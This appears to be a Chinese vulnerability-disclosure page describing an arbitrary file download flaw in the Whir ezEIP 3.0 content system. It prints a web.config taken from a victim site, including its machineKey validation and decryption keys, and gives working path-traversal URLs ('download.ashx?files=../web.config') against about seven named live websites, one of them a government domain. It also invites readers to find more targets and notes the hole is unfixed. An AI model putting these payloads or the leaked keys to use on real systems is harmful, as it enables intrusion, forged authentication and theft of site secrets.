2014-04-20: 细节已通知厂商并且等待厂商处理中 2014-04-25: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-06-19: 细节向核心白帽子及相关领域专家公开 2014-06-29: 细节向普通白帽子公开 2014-07-09: 细节向实习白帽子公开 2014-07-16: 细节向公众公开
算是通用吧。。。
<?xml version="1.0" encoding="utf-8"?><configuration> <configSections> <section name="urlrewritingnet" requirePermission="false" type="UrlRewritingNet.Configuration.UrlRewriteSection, UrlRewritingNet.UrlRewriter" /> <sectionGroup name="spring"> <section name="context" type="Spring.Context.Support.WebContextHandler, Spring.Web" /> <section name="objects" type="Spring.Context.Support.DefaultSectionHandler, Spring.Core" /> </sectionGroup> <sectionGroup name="common"> <section name="logging" type="Common.Logging.ConfigurationSectionHandler, Common.Logging" /> </sectionGroup> <section name="log4net" type="log4net.Config.Log4NetConfigurationSectionHandler,log4net" /> <section name="cachingConfiguration" type="Microsoft.Practices.EnterpriseLibrary.Caching.Configuration.CacheManagerSettings,Microsoft.Practices.EnterpriseLibrary.Caching" /> <section name="eipSetting" type="Whir.ezEIP.Web.EIPSetting, Whir.ezEIP" /> <section name="neatUpload" type="Brettle.Web.NeatUpload.ConfigSectionHandler, Brettle.Web.NeatUpload" allowLocation="true" /> </configSections> <spring> <context> <resource uri="~/config/Services.config" /> <resource uri="~/config/Pages.config" /> </context> </spring> <common> <logging> <factoryAdapter type="Common.Logging.Log4Net.Log4NetLoggerFactoryAdapter, Common.Logging.Log4Net"> <!-- choices are INLINE, FILE, FILE-WATCH, EXTERNAL--> <!-- otherwise BasicConfigurer.Configure is used --> <!-- log4net configuration file is specified with key configFile--> <arg key="configType" value="INLINE" /> </factoryAdapter> </logging> </common> <log4net> <appender name="rootRollingFile" type="log4net.Appender.RollingFileAppender,log4net"> <threshold value="ALL" /> <param name="File" value="App_Data/protected/logs/" /> <param name="AppendToFile" value="true" /> <param name="RollingStyle" value="Date" /> <param name="DatePattern" value="yyyy-MM-dd.'log'" /> <param name="StaticLogFileName" value="false" /> <layout type="log4net.Layout.PatternLayout,log4net"> <param name="ConversionPattern" value="%date [%-5thread] [%-5level] [%logger] - %message%newline %exception" /> </layout> </appender> <root> <level value="INFO" /> <!-- ALL, DEBUG, INFO, WARN, ERROR, FATAL, OFF --> <appender-ref ref="rootRollingFile" /> </root> </log4net> <cachingConfiguration defaultCacheManager="Default_Cache_Manager"> <backingStores> <add name="inMemory" type="Microsoft.Practices.EnterpriseLibrary.Caching.BackingStoreImplementations.NullBackingStore, Microsoft.Practices.EnterpriseLibrary.Caching" /> </backingStores> <cacheManagers> <add name="Default_Cache_Manager" expirationPollFrequencyInSeconds="60" maximumElementsInCacheBeforeScavenging="1000" numberToRemoveWhenScavenging="10" backingStoreName="inMemory" /> <add name="Whir_ezEIP3_LoginUserCacheManager" expirationPollFrequencyInSeconds="60" maximumElementsInCacheBeforeScavenging="1000" numberToRemoveWhenScavenging="10" backingStoreName="inMemory" /> <add name="Whir_ezEIP3_SiteInfoCacheManager" expirationPollFrequencyInSeconds="60" maximumElementsInCacheBeforeScavenging="1000" numberToRemoveWhenScavenging="10" backingStoreName="inMemory" /> <add name="Whir_ezEIP3_OY_MemberCacheManager" expirationPollFrequencyInSeconds="60" maximumElementsInCacheBeforeScavenging="1000" numberToRemoveWhenScavenging="10" backingStoreName="inMemory" /> <add name="Whir_ezEIP3_LableCacheManager" expirationPollFrequencyInSeconds="60" maximumElementsInCacheBeforeScavenging="1000" numberToRemoveWhenScavenging="10" backingStoreName="inMemory" /> </cacheManagers> </cachingConfiguration> <eipSetting productname="ezEIP 3.0" version="Whir ezEIP Website System 3.0" versiontype="Asp.Net" catchException="false" argumentExceptionMessage="传入参数有误!" adminpath="whir_system/" sysconfigfilepath="whir_system/configfiles/" uploadfilesdir="uploadfiles/" temporaryDir="App_Data/temp/" templateDir="template" templateDirInclude="include" baseTemp="res/basetemp/" adverDir="uploadfiles/adver/" /> <!--网站配置信息--> <appSettings configSource="config\AppSettings.config" /> <connectionStrings /> <system.web> <machineKey validationKey="8BFD2ECC6A29C731ABD40D0AE4DCB46920ACE1A1" decryptionKey="A7AB7AD599777BC83365EC71FC66FFF2D807494707C9D53C" decryption="3DES" validation="SHA1" /> <pages validateRequest="false" enableViewStateMac="true"> <controls> <add tagPrefix="asp" namespace="System.Web.UI" assembly="System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" /> <add tagPrefix="whir" namespace="Wuqi.Webdiyer" assembly="AspNetPager" /> <add tagPrefix="whir" namespace="Whir.Controls.UI.WebControls" assembly="Whir.Controls" /> <add tagPrefix="whir" namespace="Whir.ezEIP.Web.Controls" assembly="Whir.ezEIP" /> <add tagPrefix="wtl" tagName="include" src="~/Whir_System/controls/labelcontrol/wtl_include.ascx" /> <add tagPrefix="wtl" tagName="form" src="~/Whir_System/controls/labelcontrol/wtl_form.ascx" /> <add tagPrefix="wtl" tagName="list" src="~/Whir_System/controls/labelcontrol/wtl_list.ascx" /> <add tagPrefix="wtl" tagName="page" src="~/Whir_System/controls/labelcontrol/wtl_page.ascx" /> <add tagPrefix="wtl" tagName="system" src="~/Whir_System/controls/labelcontrol/wtl_system.ascx" /> <add tagPrefix="wtl" tagName="infor" src="~/Whir_System/controls/labelcontrol/wtl_infor.ascx" /> <add tagPrefix="wtl" tagName="inforarea" src="~/Whir_System/controls/labelcontrol/wtl_inforarea.ascx" /> <add tagPrefix="wtl" tagName="column" src="~/Whir_System/controls/labelcontrol/wtl_column.ascx" /> <add tagPrefix="wtl" tagName="location" src="~/Whir_System/controls/labelcontrol/wtl_location.ascx" /> <add tagPrefix="wtl" tagName="menu" src="~/Whir_System/controls/labelcontrol/wtl_menu.ascx" /> <add tagPrefix="wtl" tagName="type" src="~/Whir_System/controls/labelcontrol/wtl_type.ascx" /> <add tagPrefix="wtl" tagName="play" src="~/Whir_System/controls/labelcontrol/wtl_play.ascx" /> <add tagPrefix="wtl" tagName="flash" src="~/Whir_System/controls/labelcontrol/wtl_flash.ascx" /> <add tagPrefix="wtl" tagName="video" src="~/Whir_System/controls/labelcontrol/wtl_video.ascx" /> <add tagPrefix="wtl" tagName="image" src="~/Whir_System/controls/labelcontrol/wtl_image.ascx" /> <add tagPrefix="wtl" tagName="service" src="~/Whir_System/controls/labelcontrol/wtl_service.ascx" /> <add tagPrefix="wtl" tagName="statis" src="~/Whir_System/controls/labelcontrol/wtl_statis.ascx" /> <add tagPrefix="wtl" tagName="photo" src="~/Whir_System/controls/labelcontrol/wtl_photo.ascx" /> <add tagPrefix="wtl" tagName="marquee" src="~/Whir_System/controls/labelcontrol/wtl_marquee.ascx" /> <add tagPrefix="wtl" tagName="url" src="~/Whir_System/controls/labelcontrol/wtl_url.ascx" /> <add tagPrefix="wtl" tagName="seo" src="~/Whir_System/controls/labelcontrol/wtl_seo.ascx" /> <add tagPrefix="wtl" tagName="comment" src="~/Whir_System/controls/labelcontrol/wtl_comment.ascx" /> <add tagPrefix="wtl" tagName="commentlist" src="~/Whir_System/controls/labelcontrol/wtl_commentlist.ascx" /> <add tagPrefix="wtl" tagName="search" src="~/Whir_System/controls/labelcontrol/wtl_search.ascx" /> <add tagPrefix="wtl" tagName="jobrequest" src="~/Whir_System/controls/labelcontrol/wtl_jobrequest.ascx" /> <add tagPrefix="wtl" tagName="resource" src="~/Whir_System/controls/labelcontrol/wtl_resource.ascx" /> <add tagPrefix="wtl" tagName="feedback" src="~/Whir_System/controls/labelcontrol/wtl_feedback.ascx" /> <add tagPrefix="wtl" tagName="forgetpassword" src="~/Whir_System/controls/pagecontrol/forgetpassword.ascx" /> <add tagPrefix="wtl" tagName="login" src="~/Whir_System/controls/pagecontrol/login.ascx" /> <add tagPrefix="wtl" tagName="register" src="~/Whir_System/controls/pagecontrol/register.ascx" /> <add tagPrefix="wtl" tagName="agreement" src="~/Whir_System/controls/pagecontrol/registeragreement.ascx" /> <add tagPrefix="wtl" tagName="memberinfo" src="~/Whir_System/controls/pagecontrol/memberinfo.ascx" /> <add tagPrefix="wtl" tagName="changepassword" src="~/Whir_System/controls/pagecontrol/changepassword.ascx" /> <add tagPrefix="wtl" tagName="leftmenu" src="~/Whir_System/controls/pagecontrol/LeftMenu.ascx" /> <add tagPrefix="wtl" tagName="editor" src="~/Whir_System/controls/Editor.ascx" /> </controls> </pages> <compilation debug="true"> <assemblies> <add assembly="System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" /> </assemblies> <buildProviders> <add extension=".html" type="System.Web.Compilation.PageBuildProvider" /> </buildProviders> </compilation> <!-- 通过 <authentication> 节可以配置 ASP.NET 用来 识别进入用户的 安全身份验证模式。 --> <authentication mode="Windows" /> <!-- 如果在执行请求的过程中出现未处理的错误, 则通过 <customErrors> 节可以配置相应的处理步骤。具体说来, 开发人员通过该节可以配置 要显示的 html 错误页 以代替错误堆栈跟踪。 <customErrors mode="On" defaultRedirect="GenericErrorPage.htm"> <error statusCode="403" redirect="NoAccess.htm" /> <error statusCode="404" redirect="FileNotFound.htm" /> </customErrors> --> <customErrors mode="On" defaultRedirect="GenericErrorPage.htm"> <error statusCode="403" redirect="NoAccess.htm" /> <error statusCode="404" redirect="FileNotFound.htm" /> </customErrors><httpHandlers><add verb="*" path="*.html" type="System.Web.UI.PageHandlerFactory" /> <add verb="*" path="*.aspx" type="Spring.Web.Support.PageHandlerFactory, Spring.Web" /> <add verb="*" path="checkcode.ashx" type="Whir.ezEIP.Web.HttpHandlers.CheckCodeHandler, Whir.ezEIP" /> <add verb="*" path="gettreedata.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetTreeData, Whir.ezEIP" /> <add verb="*" path="download.ashx" type="Whir.ezEIP.Web.HttpHandlers.DownloadHandler, Whir.ezEIP" /> <add verb="*" path="formsubmit.ashx" type="Whir.ezEIP.Web.HttpHandlers.FormSubmitHandler, Whir.ezEIP" /> <add verb="*" path="getarea.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetArea, Whir.ezEIP" /> <add verb="GET,HEAD" path="ScriptResource.axd" type="System.Web.Handlers.ScriptResourceHandler, System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" validate="false" /> </httpHandlers> <httpModules> <add name="SpringModule" type="Spring.Context.Support.WebSupportModule, Spring.Web" /> <add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload" /> <add name="UrlRewriteModule" type="UrlRewritingNet.Web.UrlRewriteModule, UrlRewritingNet.UrlRewriter" /> </httpModules> <httpRuntime maxRequestLength="2097151" executionTimeout="3600" /> </system.web> <!-- 重定向 --> <urlrewritingnet configSource="Config\UrlRewriteSettings.config" /> <!-- For IIS7's Integrated Pipeline Mode which is used by the DefaultAppPool. --> <system.webServer> <modules> <add name="UploadHttpModule" type="Brettle.Web.NeatUpload.UploadHttpModule, Brettle.Web.NeatUpload" preCondition="managedHandler" /> <add name="SpringModule" type="Spring.Context.Support.WebSupportModule, Spring.Web" /> </modules> <handlers> <add name="html" path="*.html" verb="*" modules="IsapiModule" scriptProcessor="C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_isapi.dll" resourceType="Unspecified" preCondition="classicMode,runtimeVersionv2.0,bitness64" /> <add verb="*" name="checkcode" path="checkcode.ashx" type="Whir.ezEIP.Web.HttpHandlers.CheckCodeHandler, Whir.ezEIP" /> <add verb="*" name="gettreedata" path="gettreedata.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetTreeData, Whir.ezEIP" /> <add verb="*" name="download" path="download.ashx" type="Whir.ezEIP.Web.HttpHandlers.DownloadHandler, Whir.ezEIP" /> <add verb="*" name="formsubmit" path="formsubmit.ashx" type="Whir.ezEIP.Web.HttpHandlers.FormSubmitHandler, Whir.ezEIP" /> <add verb="*" name="getarea" path="getarea.ashx" type="Whir.ezEIP.Web.HttpHandlers.GetArea, Whir.ezEIP" /> <add verb="*" name="SpringPageHandler" path="*.aspx" type="Spring.Web.Support.PageHandlerFactory, Spring.Web" /> <!--<add name="SpringPageHandler" verb="*" path="*.aspx" type="Spring.Web.Support.PageHandlerFactory, Spring.Web"/>--> <add name="SpringContextMonitor" verb="*" path="ContextMonitor.ashx" type="Spring.Web.Support.ContextMonitor, Spring.Web" /> <!--Not using Spring web service support--> <add name="SpringWebServiceSupport" verb="*" path="*.asmx" type="Spring.Web.Services.WebServiceHandlerFactory, Spring.Web" /> </handlers> <validation validateIntegratedModeConfiguration="false" /> <rewrite> <rules> <rule name="rules_solution_detail_en"><match url="solution_en/([a-zA-Z0-9]+)_(\d+).html" /> <action type="Rewrite" url="siteen/solution_detail.aspx?PY={R:1}&page={R:2}" /> </rule> <rule name="rules_solution_detail_cn2"><match url="solution_detail_cn_([a-zA-Z0-9]+)_(\d+).html" /> <action type="Rewrite" url="sitecn/solution_detail.aspx?PY={R:1}&page={R:2}" /> </rule> <rule name="rules_solution_list_en"><match url="solution/solution_list_en_(\d+).html" /> <action type="Rewrite" url="siteen/solution_list.aspx?cid={R:1}" /> </rule> <rule name="rules_solution_category_en"><match url="solution/solution_category_en_(\d+).html" /> <action type="Rewrite" url="siteen/solution_category.aspx?cid={R:1}" /> </rule> <rule name="rules_product_category_en"><match url="product/product_category_en_(\d+).html" /> <action type="Rewrite" url="siteen/product_category.aspx?cid={R:1}" /> </rule> <rule name="rules_product_list_en"><match url="product/product_list_en_(\d+).html" /> <action type="Rewrite" url="siteen/product_list.aspx?cid={R:1}" /> </rule> <rule name="rules_product_category"><match url="product/product_category_cn_(\d+).html" /> <action type="Rewrite" url="sitecn/product_category.aspx?cid={R:1}" /> </rule> <rule name="rules_product_list"><match url="product_list_cn_(\d+).html" /> <action type="Rewrite" url="sitecn/product_list.aspx?cid={R:1}" /> </rule> <rule name="rules_product_detail"><match url="product/product_detail_cn_(\d+).html" /> <action type="Rewrite" url="sitecn/product_detail.aspx?pid={R:1}" /> </rule> <rule name="rules_product_index"><match url="sitecn/product/index.html" /> <action type="Rewrite" url="sitecn/product.aspx" /> </rule><rule name="rules_product_index_en1" stopProcessing="true"><match url="siteen/product/index.html" /> <action type="Rewrite" url="siteen/product/index.html" /> </rule> <rule name="rules_product_detail_PY"><match url="product/([a-zA-Z0-9]+).html" /> <action type="Rewrite" url="sitecn/product_detail.aspx?PY={R:1}" /> </rule> <rule name="rules_solution_index"><match url="solution/index.html" /> <action type="Rewrite" url="sitecn/solution.aspx" /> </rule> <rule name="rules_solution_list"><match url="solution_list_cn_(\d+).html" /> <action type="Rewrite" url="sitecn/solution_list.aspx?cid={R:1}" /> </rule> <rule name="rules_solution_detail"><match url="solution/([a-zA-Z0-9]+)_(\d+).html" /> <action type="Rewrite" url="sitecn/solution_detail.aspx?PY={R:1}&page={R:2}" /> </rule> <rule name="rules_solution_category"><match url="solution/solution_category_cn_(\d+).html" /> <action type="Rewrite" url="sitecn/solution_category.aspx?cid={R:1}" /> </rule> <rule name="rules_news_detail_PY"> <match url="sitecn/news/([a-zA-Z0-9]+).html" /> <action type="Rewrite" url="sitecn/news_detail.aspx?PY={R:1}" /> </rule> <rule name="rules_product_detail_en"><match url="product/product_detail_en_(\d+).html" /> <action type="Rewrite" url="siteen/product_detail.aspx?pid={R:1}" /> </rule> <rule name="rules_product_index_en"><match url="product/indexen.html" /> <action type="Rewrite" url="siteen/product.aspx" /> </rule> <rule name="rules_product_detail_PY_en"><match url="product_en_([a-zA-Z0-9]+).html" /> <action type="Rewrite" url="siteen/product_detail.aspx?PY={R:1}" /> </rule> <rule name="rules_solution_index_en"> <match url="solution/indexen.html" /> <action type="Rewrite" url="siteen/solution.aspx" /> </rule> <!--<rule name="rules_news_detail_PY_en"><match url="siteen/news/([a-zA-Z0-9]+).html" /> <action type="Rewrite" url="siteen/news_detail.aspx?PY={R:1}" /> </rule>--> </rules> </rewrite> <defaultDocument> <files> <clear /> <add value="index.html" /> <add value="default.aspx" /> <add value="Default.htm" /> <add value="Default.asp" /> <add value="index.htm" /> <add value="iisstart.htm" /> </files> </defaultDocument> </system.webServer></configuration>
ezeip任意文件下载漏洞 测试地址:http://www.wanhu.com.cn/download.ashx?files=../web.config
测试几个网站均有此漏洞http://www.sontanedu.cn/download.ashx?files=../web.confighttp://www.epccn.com/download.ashx?files=../web.confighttp://zwgk.tl.gov.cn//download.ashx?files=../web.confighttp://www.gzwanbao.com/download.ashx?files=../web.confighttp://www.bb1y.com/download.ashx?files=../web.confighttp://www.zsty.org/download.ashx?files=../web.config百度前十个网站。全部存在。其他自己挖掘吧。
来个邀请码
危害等级:无影响厂商忽略
忽略时间:2014-07-16 14:01
2014-04-25:sorry,一时工作较忙,忘了在时间点进行确认。该漏洞已经复现多个实例,并由CNVD向软件生产厂商通报。主要涉及商业公司,政府的后续待处置。经验证,主要涉及3.0版本。
额、楼主真受伤
@zhxs 我也发现了。。
还没修复,继续下吧……
